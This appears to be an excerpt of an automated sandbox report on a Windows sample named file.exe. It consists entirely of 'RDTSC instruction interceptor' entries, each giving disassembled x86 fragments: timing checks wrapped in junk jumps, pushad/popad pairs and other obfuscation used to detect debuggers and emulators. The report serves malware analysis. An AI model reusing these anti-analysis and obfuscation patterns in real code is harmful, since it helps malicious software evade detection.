Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0648 second address: 79C0683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+50h] 0x00000009 pushad 0x0000000a jmp 00007F3650BE6D82h 0x0000000f jmp 00007F3650BE6D82h 0x00000014 popad 0x00000015 mov dword ptr [esi+14h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edi, ax 0x0000001e mov ebx, ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0683 second address: 79C06AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3650C99DA5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C06AC second address: 79C06BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650BE6D7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C06BC second address: 79C06D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3650C99D9Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C06D3 second address: 79C07A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F3650BE6D7Ah 0x0000000c and ch, FFFFFFF8h 0x0000000f jmp 00007F3650BE6D7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebx+58h] 0x0000001b pushad 0x0000001c call 00007F3650BE6D84h 0x00000021 pushad 0x00000022 popad 0x00000023 pop ecx 0x00000024 mov ax, dx 0x00000027 popad 0x00000028 mov dword ptr [esi+1Ch], eax 0x0000002b jmp 00007F3650BE6D83h 0x00000030 mov eax, dword ptr [ebx+5Ch] 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F3650BE6D84h 0x0000003a add cl, FFFFFFE8h 0x0000003d jmp 00007F3650BE6D7Bh 0x00000042 popfd 0x00000043 mov esi, 275DCFDFh 0x00000048 popad 0x00000049 mov dword ptr [esi+20h], eax 0x0000004c jmp 00007F3650BE6D82h 0x00000051 mov eax, dword ptr [ebx+60h] 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007F3650BE6D7Eh 0x0000005b add ax, C178h 0x00000060 jmp 00007F3650BE6D7Bh 0x00000065 popfd 0x00000066 movzx ecx, di 0x00000069 popad 0x0000006a mov dword ptr [esi+24h], eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F3650BE6D7Eh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C07A9 second address: 79C07E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 5D84h 0x00000007 call 00007F3650C99D9Dh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [ebx+64h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3650C99DA9h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C07E1 second address: 79C07E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C07E7 second address: 79C07FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99DA3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C07FE second address: 79C082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3650BE6D7Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C082F second address: 79C086B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+68h] 0x0000000d jmp 00007F3650C99DA5h 0x00000012 mov dword ptr [esi+2Ch], eax 0x00000015 jmp 00007F3650C99D9Eh 0x0000001a mov ax, word ptr [ebx+6Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C086B second address: 79C0872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0872 second address: 79C0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d pushad 0x0000000e mov ecx, 56839EADh 0x00000013 pushfd 0x00000014 jmp 00007F3650C99D9Ah 0x00000019 and al, 00000048h 0x0000001c jmp 00007F3650C99D9Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ax, word ptr [ebx+00000088h] 0x0000002a pushad 0x0000002b jmp 00007F3650C99DA4h 0x00000030 popad 0x00000031 mov word ptr [esi+32h], ax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F3650C99DA8h 0x0000003e sbb esi, 22D7BE08h 0x00000044 jmp 00007F3650C99D9Bh 0x00000049 popfd 0x0000004a movzx esi, di 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0904 second address: 79C0984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, cl 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 pushad 0x00000012 push esi 0x00000013 mov edi, 0C019B14h 0x00000018 pop edx 0x00000019 pushfd 0x0000001a jmp 00007F3650BE6D7Ah 0x0000001f sbb cx, 3398h 0x00000024 jmp 00007F3650BE6D7Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esi+34h], eax 0x0000002e pushad 0x0000002f jmp 00007F3650BE6D84h 0x00000034 popad 0x00000035 mov eax, dword ptr [ebx+18h] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov si, 772Fh 0x0000003f pushfd 0x00000040 jmp 00007F3650BE6D84h 0x00000045 sub si, 3858h 0x0000004a jmp 00007F3650BE6D7Bh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0984 second address: 79C0A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007F3650C99D9Eh 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F3650C99D9Eh 0x0000001b sbb eax, 03BBFD18h 0x00000021 jmp 00007F3650C99D9Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F3650C99DA8h 0x0000002d sbb eax, 77FBE778h 0x00000033 jmp 00007F3650C99D9Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov dword ptr [esi+3Ch], eax 0x0000003d pushad 0x0000003e movzx ecx, bx 0x00000041 mov edx, 2AC07D54h 0x00000046 popad 0x00000047 mov eax, dword ptr [ebx+20h] 0x0000004a jmp 00007F3650C99DA3h 0x0000004f mov dword ptr [esi+40h], eax 0x00000052 jmp 00007F3650C99DA6h 0x00000057 lea eax, dword ptr [ebx+00000080h] 0x0000005d jmp 00007F3650C99DA0h 0x00000062 push 00000001h 0x00000064 jmp 00007F3650C99DA0h 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d pushad 0x0000006e popad 0x0000006f mov ecx, ebx 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0A70 second address: 79C0AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3650BE6D7Bh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3650BE6D85h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0AAC second address: 79C0AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov bh, 99h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3650C99D9Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0AC9 second address: 79C0ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0ACD second address: 79C0AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0C01 second address: 79C0C75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3650BE6D87h 0x00000009 xor al, 0000007Eh 0x0000000c jmp 00007F3650BE6D89h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+04h], eax 0x0000001a pushad 0x0000001b mov ebx, esi 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 lea eax, dword ptr [ebx+78h] 0x00000024 jmp 00007F3650BE6D7Eh 0x00000029 push 00000001h 0x0000002b jmp 00007F3650BE6D80h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edx, 05C799F0h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0C75 second address: 79C0C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0C7B second address: 79C0C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0C7F second address: 79C0C8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0C8F second address: 79C0C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0C94 second address: 79C0CC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F3650C99DA0h 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CC0 second address: 79C0CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CC4 second address: 79C0CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CC8 second address: 79C0CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CCE second address: 79C0CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CD4 second address: 79C0CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CD8 second address: 79C0CDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CDC second address: 79C0CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CEB second address: 79C0CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CEF second address: 79C0CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0CF5 second address: 79C0D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99D9Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0D06 second address: 79C0D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0D90 second address: 79C0DCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d pushad 0x0000000e call 00007F3650C99D9Ah 0x00000013 mov ecx, 1435F2C1h 0x00000018 pop esi 0x00000019 mov si, bx 0x0000001c popad 0x0000001d test edi, edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007F3650C99DA2h 0x00000027 pop ecx 0x00000028 mov dh, 03h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0DCD second address: 79C0E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, C5h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F36BE025658h 0x00000010 jmp 00007F3650BE6D80h 0x00000015 mov eax, dword ptr [ebp-04h] 0x00000018 jmp 00007F3650BE6D80h 0x0000001d mov dword ptr [esi+08h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F3650BE6D7Dh 0x00000029 add ch, FFFFFF86h 0x0000002c jmp 00007F3650BE6D81h 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F3650BE6D80h 0x00000038 and eax, 53E68128h 0x0000003e jmp 00007F3650BE6D7Bh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0E4D second address: 79C0E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0E53 second address: 79C0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e jmp 00007F3650BE6D86h 0x00000013 push 00000001h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0E85 second address: 79C0E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0E8B second address: 79C0E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0E91 second address: 79C0E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0E95 second address: 79C0E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0E99 second address: 79C0EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F3650C99D9Ah 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, 9873h 0x00000016 mov cx, 48CFh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0EB9 second address: 79C0EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0EBF second address: 79C0EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0EC3 second address: 79C0F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F3650BE6D83h 0x0000000e lea eax, dword ptr [ebp-18h] 0x00000011 pushad 0x00000012 call 00007F3650BE6D84h 0x00000017 mov ah, A5h 0x00000019 pop edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3650BE6D7Ah 0x00000021 add ax, 5D08h 0x00000026 jmp 00007F3650BE6D7Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F3650BE6D88h 0x00000032 or ah, 00000068h 0x00000035 jmp 00007F3650BE6D7Bh 0x0000003a popfd 0x0000003b popad 0x0000003c popad 0x0000003d nop 0x0000003e jmp 00007F3650BE6D86h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F3650BE6D7Dh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0F6A second address: 79C0F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0F6E second address: 79C0F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0F74 second address: 79C0F7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0F7A second address: 79C0F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0F7E second address: 79C0FAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3650C99D9Ah 0x00000012 jmp 00007F3650C99DA5h 0x00000017 popfd 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1042 second address: 79C105E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 314CF64Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebp-14h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 23BA2749h 0x00000018 mov dx, cx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C105E second address: 79C10BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, AD14h 0x00000007 movsx edi, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f pushad 0x00000010 jmp 00007F3650C99DA2h 0x00000015 pushfd 0x00000016 jmp 00007F3650C99DA2h 0x0000001b sub si, CFF8h 0x00000020 jmp 00007F3650C99D9Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esi+0Ch], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F3650C99DA5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C10BF second address: 79C10C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C10C5 second address: 79C10F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, 74E806ECh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F3650C99DA2h 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C10F9 second address: 79C113F instructions: 0x00000000 rdtsc 0x00000002 mov dh, 38h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F3650BE6D7Ch 0x0000000c jmp 00007F3650BE6D85h 0x00000011 popfd 0x00000012 popad 0x00000013 sub eax, eax 0x00000015 pushad 0x00000016 mov bx, 1E60h 0x0000001a mov bh, C0h 0x0000001c popad 0x0000001d lock cmpxchg dword ptr [edx], ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F3650BE6D7Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C113F second address: 79C1143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1143 second address: 79C1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1149 second address: 79C114F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C114F second address: 79C1153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1153 second address: 79C1162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1162 second address: 79C1166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1166 second address: 79C116A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C116A second address: 79C1170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1170 second address: 79C1183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99D9Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1183 second address: 79C1187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1187 second address: 79C11B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007F3650C99DA5h 0x0000000f jne 00007F36BE0D82CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C11B1 second address: 79C11BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 33DAEDACh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C12A9 second address: 79C12AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C12AD second address: 79C12C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C12C6 second address: 79C1332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3650C99D9Ch 0x00000013 or cx, 4AC8h 0x00000018 jmp 00007F3650C99D9Bh 0x0000001d popfd 0x0000001e jmp 00007F3650C99DA8h 0x00000023 popad 0x00000024 mov dword ptr [edx+10h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F3650C99DA7h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1332 second address: 79C1361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3650BE6D7Dh 0x00000013 rdtsc
